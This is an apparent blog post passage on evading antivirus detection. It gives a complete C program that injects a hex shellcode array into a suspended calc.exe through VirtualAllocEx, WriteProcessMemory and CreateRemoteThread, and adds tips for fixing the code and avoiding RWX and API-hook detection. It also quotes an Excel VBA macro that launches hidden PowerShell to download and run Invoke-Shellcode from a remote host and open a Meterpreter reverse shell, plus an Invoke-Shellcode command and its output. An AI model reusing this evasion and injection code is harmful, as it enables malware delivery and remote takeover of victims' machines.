        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xfe\xef\xd3\x7a\x68\x67\xa7\x48\x37\xd3\x2f\xe0\xb0\xfd\xa8&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x71\xd6\xfd\x67\x39\xb7\x03\x88\x39\x91\xc7\xdc\x69\x89\xee&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x5c\xe2\x49\x0e\x89\x9e\x43\x98\xf2\xf6\xfa\xdc\x9b\x04\x03&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xcc\x07\x81\xe5\xbe\xe7\xc1\xb9\x7e\x58\xa1\x69\x17\xb2\x2e&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x55\x07\xbd\xe5\xfe\xa2\x52\x53\x56\x5b\xca\xfe\x2c\xfa\x13&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xd5\x48\x3c\x9f\xdf\xad\xf3\x68\xaa\xbd\xe4\x0e\x54\x3e\xf5&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xba\x54\x54\xf1\x6c\x03\xc0\xfb\x49\x63\x4f\x03\xbc\xf0\x88&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xfb\x41\xc0\xe3\xca\xd7\x6c\x9c\x32\x38\x6c\x5c\x65\x52\x6c&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x34\xd1\x06\x3f\x21\x1e\x93\x2c\xfa\x8b\x1c\x04\xae\x1c\x75&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xaa\x89\x6b\xda\x55\xfc\xef\x1d\xa9\x82\xc7\x85\xc1\x7c\x58&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x36\x11\x17\x58\x66\x79\xec\x77\x89\x49\x0d\x52\xc2\xc1\x84&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x33\xa0\x70\x98\x19\x64\x2c\x99\xae\xbd\xdf\xe0\xdf\x42\x20&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\x15\xf6\x26\x21\x15\xf6\x58\x1e\xc3\xcf\x2e\x61\xd7\x6b\x20&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;
        &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\xd4\x7a\xdd\xab\x16\x28\x1d\xfe&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;


    &lt;span class="n"&gt;BOOL&lt;/span&gt; &lt;span class="nf"&gt;injection&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kt"&gt;wchar_t&lt;/span&gt; &lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;MAX_PATH&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="n"&gt;STARTUPINFO&lt;/span&gt; &lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;PROCESS_INFORMATION&lt;/span&gt; &lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;LPVOID&lt;/span&gt; &lt;span class="n"&gt;lpMalwareBaseAddr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;LPVOID&lt;/span&gt; &lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;HANDLE&lt;/span&gt; &lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;DWORD&lt;/span&gt; &lt;span class="n"&gt;dwExitCode&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;BOOL&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="n"&gt;lpMalwareBaseAddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="n"&gt;GetSystemDirectory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MAX_PATH&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;_tcscat&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;L"&lt;/span&gt;&lt;span class="se"&gt;\\&lt;/span&gt;&lt;span class="s"&gt;calc.exe"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"Injection program Name:%S&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="n"&gt;ZeroMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
        &lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;cb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;ZeroMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;CreateProcess&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Cappname&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;FALSE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;CREATE_SUSPENDED&lt;/span&gt;
            &lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;si&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;VirtualAllocEx&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;
            &lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;MEM_COMMIT&lt;/span&gt; &lt;span class="o"&gt;|&lt;/span&gt; &lt;span class="n"&gt;MEM_RESERVE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="n"&gt;PAGE_EXECUTE_READWRITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;

        &lt;span class="n"&gt;WriteProcessMemory&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPVOID&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;lpMalwareBaseAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;shellcode&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="n"&gt;hThread&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;CreateRemoteThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPTHREAD_START_ROUTINE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;lpnewVictimBaseAddr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

        &lt;span class="n"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;INFINITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;GetExitCodeProcess&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;dwExitCode&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;TerminateProcess&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;pi&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hProcess&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;bRet&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;help&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;proc&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;printf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"%s:[-] start a process and injection shellcode to memory&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;proc&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;argc&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[])&lt;/span&gt;
    &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;help&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
        &lt;span class="n"&gt;injection&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;A few points to be aware of before reusing this listing. &lt;code&gt;sizeof(shellcode) + 1&lt;/code&gt; in the &lt;code&gt;VirtualAllocEx&lt;/code&gt; and &lt;code&gt;WriteProcessMemory&lt;/code&gt; calls reads one byte past the end of the array (the string-literal initialiser already includes its NUL terminator), so &lt;code&gt;sizeof(shellcode)&lt;/code&gt; alone is sufficient. The return values of &lt;code&gt;WriteProcessMemory&lt;/code&gt; and &lt;code&gt;CreateRemoteThread&lt;/code&gt; are never checked and &lt;code&gt;bRet&lt;/code&gt; is never set to &lt;code&gt;TRUE&lt;/code&gt;, so the caller cannot distinguish success from failure. &lt;code&gt;WaitForSingleObject&lt;/code&gt; waits on &lt;code&gt;pi.hThread&lt;/code&gt; — the primary thread that was created suspended and is never resumed — rather than on the remote thread &lt;code&gt;hThread&lt;/code&gt;, so it returns only when the whole process exits and otherwise blocks indefinitely; none of the process or thread handles are closed. The &lt;code&gt;wchar_t&lt;/code&gt; buffer combined with the &lt;code&gt;GetSystemDirectory&lt;/code&gt;/&lt;code&gt;_tcscat&lt;/code&gt; macros only builds with &lt;code&gt;UNICODE&lt;/code&gt;/&lt;code&gt;_UNICODE&lt;/code&gt; defined; calling the explicit &lt;code&gt;W&lt;/code&gt; variants removes that dependency. Finally, a &lt;code&gt;PAGE_EXECUTE_READWRITE&lt;/code&gt; allocation followed by &lt;code&gt;WriteProcessMemory&lt;/code&gt; and &lt;code&gt;CreateRemoteThread&lt;/code&gt; is the canonical sequence behavioural detection looks for (compare Figure 21); allocating read-write, writing, then switching to read-execute with &lt;code&gt;VirtualProtectEx&lt;/code&gt; removes the RWX indicator, although the API sequence itself remains visible.&lt;/p&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ft7e1yz82iur8jxg9dnef.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ft7e1yz82iur8jxg9dnef.png" alt="*Figure 19: Process injection code compilation" width="800" height="389"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;*Figure 19: Process injection code compilation
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpi0ydrr4t4cyqw19cwcp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fpi0ydrr4t4cyqw19cwcp.png" alt="Figure 20: Process injection execution" width="799" height="219"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 20: Process injection execution
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzt9kww4yanr0x5rpvxe6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fzt9kww4yanr0x5rpvxe6.png" alt="Figure 21: Detection results for process injection" width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 21: Detection results for process injection
  &lt;p&gt;&lt;/p&gt;

&lt;p&gt;I shall conclude the injection examples here. Consider the question: how can one circumvent API hooking detection? Function substitution offers one approach: if a sensor hooks one specific Win32 export, calling a different export that reaches the same kernel functionality may sidestep that hook. Bear in mind, however, that most of these wrappers converge on the same &lt;code&gt;ntdll&lt;/code&gt; stubs (for the allocation family, &lt;code&gt;NtAllocateVirtualMemory&lt;/code&gt;), so a sensor that hooks at the ntdll level, or that watches the resulting executable memory-protection changes, is not evaded by the substitution at all. For instance, among the Win32 APIs, there exist numerous alternatives to &lt;code&gt;VirtualAlloc&lt;/code&gt; that can be employed:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fmqwq3se7dnjblw7oyxkb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fmqwq3se7dnjblw7oyxkb.png" alt="Figure 22: Alternative memory allocation functions" width="799" height="464"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 22: Alternative memory allocation functions
  &lt;p&gt;&lt;/p&gt;




&lt;h2&gt;
  
  
  0x03 Technique Combinations
&lt;/h2&gt;

&lt;p&gt;We have discussed various techniques, encompassing the &lt;strong&gt;separation&lt;/strong&gt; approach (loaders executing shellcode, &lt;strong&gt;whitelist exploitation&lt;/strong&gt; for malicious execution), as well as &lt;strong&gt;shellcode encoding, encryption, and injection&lt;/strong&gt;. Each technique individually contributes to evasion to some degree; however, employing any single technique in isolation often presents certain &lt;strong&gt;limitations&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The key consideration is &lt;strong&gt;combining&lt;/strong&gt; these techniques to achieve optimal results.&lt;/p&gt;

&lt;p&gt;Here is a particularly effective example:&lt;/p&gt;

&lt;h4&gt;
  
  
  Powershell-Payload-Excel-Delivery
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/" rel="noopener noreferrer"&gt;https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The chain runs as follows: a &lt;strong&gt;VBA macro&lt;/strong&gt; in the Excel document uses WMI (&lt;code&gt;Win32_Process.Create&lt;/code&gt;) to spawn a hidden &lt;strong&gt;PowerShell&lt;/strong&gt; process, which pulls Graeber's &lt;code&gt;Invoke-Shellcode&lt;/code&gt; (from PowerSploit) with &lt;code&gt;IEX&lt;/code&gt; and injects the Meterpreter &lt;strong&gt;shellcode&lt;/strong&gt; entirely in memory (optionally encoded); the repository is intended to give persistent backdoor access. Two OPSEC caveats are visible in the snippet below: the stager is fetched over cleartext HTTP, and &lt;code&gt;powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden&lt;/code&gt; spawned via WMI from an Office document is a textbook detection signature for both process-tree and script-block logging.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Set objProcess = GetObject("winmgmts:\\" &amp;amp; strComputer &amp;amp; "\root\cimv2:Win32_Process")
        objProcess.Create "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.1.127/Invoke-Shellcode')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.127 -Lport 1111 -Force", Null, objConfig, intProcessID
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fz3aihxkjwpa2xk3tdmc3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fz3aihxkjwpa2xk3tdmc3.png" alt="Figure 23: PowerShell payload delivery via Excel" width="799" height="291"&gt;&lt;/a&gt;&lt;/p&gt;&lt;br&gt;Figure 23: PowerShell payload delivery via Excel
  &lt;p&gt;&lt;/p&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;C:\PS&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Start-Process&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Windows\SysWOW64\notepad.exe&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-WindowStyle&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Hidden&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;C:\PS&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;$Proc&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Get-Process&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;notepad&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;C:\PS&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Invoke-Shellcode&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-ProcessId&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;$Proc&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;Id&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Payload&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;windows/meterpreter/reverse_https&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Lhost&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;192.168.30.129&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Lport&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;443&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-Verbose&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;VERBOSE:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Requesting&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;meterpreter&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;payload&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;from&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;https://192.168.30.129:443/INITM&lt;/span&gt;&lt;span class="w"&gt;
